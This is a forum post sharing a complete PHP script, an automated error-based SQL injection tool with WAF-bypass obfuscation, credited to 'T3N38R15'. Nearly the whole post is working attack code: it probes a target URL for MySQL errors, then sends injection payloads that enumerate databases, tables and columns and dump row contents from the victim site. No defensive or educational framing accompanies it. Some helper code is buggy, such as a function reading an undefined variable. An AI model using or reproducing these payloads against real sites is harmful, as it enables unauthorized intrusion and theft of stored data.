Jump to content
Aerosol

Auto Sqli [Error-based] + WAF Bypass

By Aerosol, in Programare

Recommended Posts

Aerosol Newbie

Aerosol

Posted
Posted 

<?php
    @set_time_limit(0);
    if(empty($_POST)==0){
        if(empty($_POST["opt1"])==0){
            $Fd=false;
            $pb=array('1"','1' . chr(39),'1');
            $_url = $_POST["url"];
            foreach($pb as $zz){
                $_buffer = LoadSite($_url . $zz, "");
                if(preg_match("#You have an error in your SQL syntax#", $_buffer)){$Fd=true;break;}
            }
            if($Fd){
                $seperator='';
                foreach($pb as $zz){
                    $fg=$_url . $zz . '+or+1+group+by+concat_ws(0x7e,version(),floor(rand(0)*2))+having+min(0)+or+1+--+f+--+';
                    $_buffer=LoadSite($fg,"");
                    if(preg_match("#Duplicate entry#",$_buffer)){$seperator=$zz;break;}
                }
                if($seperator==''){echo "NOTHING UP HERE";exit();}
                echo '<table><tr><td valign="top">';
                $fg=$_url . $seperator . '+or+1+group+by+concat_ws(0x7e,version(),user(),database(),floor(rand(0)*2))+hav?ing+min(0)+or+1+--+f+--+';
                $lde=explode('Duplicate entry',str_replace(chr(39), "", LoadSite($fg, "")));
                $_buffer1 = explode('~',$lde[1]);
                $version=$_buffer1[0];$user=$_buffer1[1];$database=$_buffer1[2];
                echo "Version : " . $version . "</br>User : " . $user . "</br>database : " . $database;
                $fg=$_url . $seperator . '+and(select+1+FROM(select+count(*),concat/*!50000*/((select+(select+(SELECT+distinct+Concat/*!50000*/(0x7e,0x27,count(schema_name),0x27,0x7e)+FROM+/*!information_schema.schemata*/+LIMIT+0,1))+FROM+/*!information_schema.tables*/+LIMIT+0,1),floor(rand(0)*2))x+FROM+/*!information_schema.tables*/+GROUP+BY+x)a)+--+f+--+';
                $lde=explode('Duplicate entry',str_replace(chr(39), "", LoadSite($fg, "")));
                $_buffer1 = explode('~',$lde[1]);
                $dbcount=$_buffer1[1];
                echo '</br>DbCount : ' . $dbcount . '</br></td><td><table border="3"><tr><td>Databases : </td></tr>';
                for ($i=0;$i<$dbcount; $i++){
                    echo '<tr><td><form name="dt' . $i . '" method="post" target="_blank" style="display:inline">';
                    $fg=$_url . $seperator . '+and(select+1+FROM(select+count(*),concat/*!50000*/((select+(select+(SELECT+distinct+Concat/*!50000*/(0x7e,0x27,CONVERT/*!50000(schema_name+USING+utf8)*/,0x27,0x7e)+FROM+/*!information_schema.schemata*/+LIMIT+'.$i.',1))+FROM+/*!information_schema.tables*/+LIMIT+0,1),floor(rand(0)*2))x+FROM+/*!information_schema.tables*/+GROUP+BY+x)a)+--+f+--+';
                    $lde=explode('Duplicate entry',str_replace(chr(39), "", LoadSite($fg, "")));
                    $_buffer1 = explode('~',$lde[1]);
                    echo '<div onclick="document.dt' . $i . '.submit()">' . $_buffer1[1] . '</div>';
                    echo '<input type="hidden" name="nameinbase" value="' . String2Hex($_buffer1[1]) . '">';
                    echo '<input type="hidden" name="url" value="' . $_url . '">';
                    echo '<input type="hidden" name="opt2" value="1">';
                    echo '<input type="hidden" name="seperator" value="';
                    switch($seperator){
                        case '1"':echo "1";break;
                        case '1' . chr(39):echo "2";break;
                        case '1':echo "3";break;
                    }
                    echo '"></form></td></tr>';
                }
                echo "</table><td></tr></table>";
            }
        }elseif(empty($_POST["opt2"])==0){
            $_url = $_POST["url"]; 
            $seperator = $_POST["seperator"]; 
            $sepe=GetSeperatorByInteger($seperator);
            $fg=$_url . $sepe .'+and(select+1+FROM(select+count(*),concat/*!50000*/((select+(select+(SELECT+concat+/*!50000*/(0x7e,0x27,count(table_name),0x27,0x7e)+FROM+/*!information_schema.tables*/+WHERE+table_schema=0x'.$_POST["nameinbase"].'))+FROM+/*!information_schema.tables+LIMIT*/+0,1),floor(rand(0)*2))x+FROM/*!50000information_schema.tables*/+GROUP+BY+x)a)+--+f+--+';
            $lde=explode('Duplicate entry',str_replace(chr(39), "", LoadSite($fg, "")));
            $_buffer1 = explode('~',$lde[1]);
            $cta=$_buffer1[1];
            echo '<table border="3"><tr><td>Tables From ' . Hex2String($_POST["nameinbase"]) . ' : (Total: '.$cta.') </td></tr>';
            for ($i=0;$i<$cta; $i++){
                echo '<tr><td><form name="dt' . $i . '" method="post" target="_blank" style="display:inline">';
                $fg = $_url . $sepe . '+and(select+1+FROM(select+count(*),concat/*!50000*/((select+(select+(SELECT+distinct+concat/*!50000*/(0x7e,0x27,CONVERT/*!50000(table_name+USING+utf8)*/,0x27,0x7e)+FROM+/*!information_schema.tables*/+WHERE+table_schema=0x'.$_POST["nameinbase"].'+LIMIT+'.$i.',1))+FROM+/*!information_schema.tables*/+LIMIT+0,1),floor(rand(0)*2))x+FROM+/*!information_schema.tables*/+GROUP+BY+x)a)+--+f+--+';
                $lde=explode('Duplicate entry',str_replace(chr(39), "", LoadSite($fg, "")));
                $_buffer1 = explode('~',$lde[1]);
                echo '<div onclick="document.dt' . $i . '.submit()">' . $_buffer1[1] . '</div>';
                echo '<input type="hidden" name="nameinbase" value="' . $_POST["nameinbase"] . '">';
                echo '<input type="hidden" name="nameinbase2" value="' . String2Hex($_buffer1[1]) . '">';
                echo '<input type="hidden" name="url" value="' . $_url . '">';
                echo '<input type="hidden" name="opt3" value="1">';
                echo '<input type="hidden" name="seperator" value="' . $seperator . '">';
                echo "</form></td></tr>";
            }
        }elseif(empty($_POST["opt3"])==0){
            $_url = $_POST["url"];
            $seperator = $_POST["seperator"]; 
            $sepe=GetSeperatorByInteger($seperator);
            $fg = $_url . $sepe . '+and(select+1+FROM(select+count(*),concat/*!50000*/((select+(select+(SELECT+concat+/*!50000*/(0x7e,0x27,count(column_name),0x27,0x7e)+FROM+/*!information_schema.columns*/+WHERE+table_schema=0x'.$_POST["nameinbase"].'+AND+table_name=0x'.$_POST["nameinbase2"].'))+FROM+/*!information_schema.tables+LIMIT*/+0,1),floor(rand(0)*2))x+FROM/*!50000information_schema.tables*/+GROUP+BY+x)a)+--+f+--+';
            $lde=explode('Duplicate entry',str_replace(chr(39), "", LoadSite($fg, "")));
            $_buffer1 = explode('~',$lde[1]);
            $cta=$_buffer1[1];
            echo '<table border="3"><tr><td>columns from ' . Hex2String($_POST["nameinbase2"]) . ' in Database ' . Hex2String($_POST["nameinbase"]) . '  (Total: '.$cta.')</td></tr>';
            for ($i=0;$i<$cta; $i++){
                echo '<tr><td><form name="dt' . $i . '" method="post" target="_blank" style="display:inline">';
                $fg=$_url . $sepe . '+and(select+1+FROM(select+count(*),concat/*!50000*/((select+(select+(select+distinct+concat/*!50000*/(0x7e,0x27,CONVERT/*!50000+(column_name+USING+utf8)*/,0x27,0x7e)+FROM+/*!50000information_schema.columns*/+WHERE+table_schema=0x'.$_POST["nameinbase"].'+AND+table_name=0x'.$_POST["nameinbase2"].'+LIMIT+'.$i.',1))+FROM+/*!50000information_schema.tables*/+LIMIT+0,1),floor(rand(0)*2))x+FROM+/*!50000information_schema.tables*/+GROUP+BY+x)a)+--+f+--+';
                $lde=explode('Duplicate entry',str_replace(chr(39), "", LoadSite($fg, "")));
                $_buffer1 = explode("~",$lde[1]);
                echo '<div onclick="document.dt' . $i . '.submit()">' . $_buffer1[1] . '</div>';
                echo '<input type="hidden" name="nameinbase" value="' . $_POST["nameinbase"] . '">';
                echo '<input type="hidden" name="nameinbase2" value="' . $_POST["nameinbase2"] . '">';
                echo '<input type="hidden" name="nameinbase3" value="' . String2Hex($_buffer1[1]) . '">';
                echo '<input type="hidden" name="url" value="' . $_url . '">';
                echo '<input type="hidden" name="opt4" value="1">';
                echo '<input type="hidden" name="seperator" value="' . $seperator . '">';
                echo "</form></td></tr>";
            }
            echo '</table>';
        }elseif(empty($_POST["opt4"])==0){
            $_url = $_POST["url"];
            $seperator = $_POST["seperator"]; 
            $sepe=GetSeperatorByInteger($seperator);
            $fg = $_url . $sepe .'+and(select+1+FROM(select+count(*),concat/*!50000*/((select+(select+(SELECT+concat+/*!50000*/(0x7e,0x27,count('.Hex2String($_POST["nameinbase3"]).'),0x27,0x7e)+FROM+'.Hex2String($_POST["nameinbase"]).'.'.Hex2String($_POST["nameinbase2"]).'))+FROM+/*!information_schema.tables+LIMIT*/+0,1),floor(rand(0)*2))x+FROM/*!50000information_schema.tables*/+GROUP+BY+x)a)+--+f+--+';
            $lde=explode('Duplicate entry',str_replace(chr(39), "", LoadSite($fg, "")));
            $_buffer1 = explode('~',$lde[1]);
            $cta=$_buffer1[1];
            echo '<table border="3"><tr><td>Items : (Total: '.$_buffer1[1].')</td></tr>';
            for ($i=0;$i<$cta; $i++){
                $fg=$_url .$sepe . '+and+(select+1+FROM(select+count(*),concat/*!50000*/((select+concat/*!50000*/(0x7e,0x27,'.Hex2String($_POST["nameinbase3"]).',0x27,0x7e)+FROM+'.Hex2String($_POST["nameinbase"]).'.'.Hex2String($_POST["nameinbase2"]).'+LIMIT+'.$i.',1),floor(rand(0)*2))x+FROM+/*!information_schema.tables*/+GROUP+BY+x)+--+f+--+';
                $lde=explode('Duplicate entry',str_replace(chr(39), "", LoadSite($fg, "")));
                $_buffer1 = explode('~',$lde[1]);
                echo '<tr><td>' . $i . '</td><td>' . $_buffer1[1] . '</td></tr>';
            }
            echo '</table';
        }
    }else{
    ?>
<style type="text/css">#sbz {text-align: center;color: #000;font-size: 20px;font-weight: bold;line-height: 0.8em;letter-spacing: 0.2em;margin:0;text-shadow: 0 1px 20px #00FF00, 0 0 5px #00FF00, 0 0px 30px #00FF00, 1px 0 3px #00FF00;}</style>
<html>
<head><title>T3N38R15 Injector for WAF Bypass</title></head>
<body>
<b id="sbz"><font size="100"></br>T3N38R15</br></br></br>Error Based SQL Injector</br></br></br></font></b>
<form method="post">
<input size="80" name="url" value="http://example.com/index.php?id="><input value="inject" type="submit">
<input type="hidden" name="opt1" value="1"></form>
</br>
Greets to Team M4DL33Ts
</body>
</html>
<?php
    }
function GetSeperatorByInteger($int){
    switch($seperator){
        case '1':return '1"';
        case '2':return '1' . chr(39);
        case '3':return '1';
    }
    return '';
}
function String2Hex($string){
    $hex='';
    for ($i=0; $i < strlen($string); $i++){
        $hex .= dechex(ord($string[$i]));
    }
    return $hex;
}
function Hex2String($hex){
    $string='';
    for ($i=0; $i < strlen($hex)-1; $i+=2){
        $string .= chr(hexdec($hex[$i].$hex[$i+1]));
    }
    return $string;
}
function LoadSite($url, $postdata){
    $agent = "Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0";
    $ch = curl_init($url);
    if ($ch){
        curl_setopt($ch,CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($ch,CURLOPT_USERAGENT, $agent);
        curl_setopt($ch,CURLOPT_FOLLOWLOCATION, 1);
    if (isset($postdata)){
        curl_setopt($ch,CURLOPT_POST, 1);
        curl_setopt($ch,CURLOPT_POSTFIELDS, $postdata);}
        $tmp = curl_exec ($ch);
        curl_close ($ch);
    }
    return $tmp;
}
?>

Credits to : T3N38R15

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...